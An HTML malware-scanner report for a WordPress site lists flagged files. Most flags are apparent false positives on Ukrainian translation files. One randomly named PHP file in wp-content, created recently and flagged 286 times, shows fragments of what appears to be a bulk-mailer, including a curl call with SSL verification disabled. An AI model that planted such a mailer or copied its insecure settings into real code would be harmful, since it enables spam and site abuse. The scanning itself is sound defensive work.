<span style="color: #0000BB"></span><span style="color: #007700">Function %</span><span style="color: #0000BB">1$s was called with an argument that is </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">deprecated</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">> </span><span style="color: #0000BB">since version </span><span style="color: #007700">%</span><span style="color: #0000BB">2$s with no alternative available</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Функція </span><span style="color: #007700">%</span><span style="color: #0000BB">1$s викликана з аргументом</span><span style="color: #007700">, </span><span style="color: #0000BB">який </span><span style="color: #007700"><</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span><span style="color: #0000BB">вважається застарілим</span><span style="color: #007700"></</span><span style="color: #0000BB">strong</span><span style="color: #007700">></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Повідомлення email не може бути відіслано</span><span style="color: #007700">. </span><span style="color: #0000BB">Можлива причина</span><span style="color: #007700">: </span><span style="color: #0000BB">ваш хостинг відключив функцію </span><span style="color: #007700">%</span><span style="color: #0000BB">s</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #0000BB">An incomplete personal data request </span><span style="color: #007700">for </span><span style="color: #0000BB">this email address already exists</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned items with reserved names</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Фільтр </span><span style="color: #007700">%</span><span style="color: #0000BB">s повернув елементи з зарезервованими іменами</span><span style="color: #007700">.</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Original image</span><span style="color: #007700">:</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Початкове зображення</span><span style="color: #007700">:</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Once Weekly</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Один раз на тиждень</span><span style="color: #DD0000">','</span><span style="color: #0000BB">In reply</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_185").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/languages/plugins/wordpress-importer-uk.l10n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-16 14:59:54</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-16 14:59:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_186" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned the following unexpected result</span><span style="color: #007700">: %</span><span style="color: #0000BB">1$s </span><span style="color: #007700">(%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">)</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Віддалений сервер повернув наступний несподіваний результат</span><span style="color: #007700">: %</span><span style="color: #0000BB">1$s </span><span style="color: #007700">(%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">)</span><span style="color: #DD0000">','</span><span style="color: #0000BB">Request failed due to an error</span><span style="color: #007700">: %</span><span style="color: #0000BB">1$s </span><span style="color: #007700">(%</span><span style="color: #0000BB">2$s</span><span style="color: #007700">)</span><span style="color: #DD0000">'=>'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_186").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/languages/admin-network-uk.l10n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 55.19 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-12-02 12:29:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_187" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions </span><span style="color: #007700">and </span><span style="color: #0000BB">cannot be used </span><span style="color: #007700">as </span><span style="color: #0000BB">site names</span><span style="color: #007700">: %</span><span style="color: #0000BB">s</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Наступні слова зарезервовані для використання функціями WordPress і не можуть бути використані в якості назви сайту</span><span style="color: #007700">: %</span><span style="color: #0000BB">s</span><span style="color: #DD0000">','</span><span style="color: #007700">If </span><span style="color: #0000BB">y</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_187").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/languages/themes/twentytwentyfour-uk.l10n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 45.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-12-02 16:44:19</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_188" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality to redefine architectural excellence</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span><span style="color: #0000BB">Études</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_188").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/languages/themes/twentytwentythree-uk.l10n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.46 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-12-02 16:44:19</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_189" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned from a search</span><span style="color: #007700"></span><span style="color: #0000BB">Sorry</span><span style="color: #007700">, </span><span style="color: #0000BB">but nothing matched your search terms</span><span style="color: #007700">. </span><span style="color: #0000BB">Please </span><span style="color: #007700">try </span><span style="color: #0000BB">again with some different keywords</span><span style="color: #007700">.</span><span style="color: #DD0000">'=>'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_189").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/UZgbTv5WBya.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_190" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
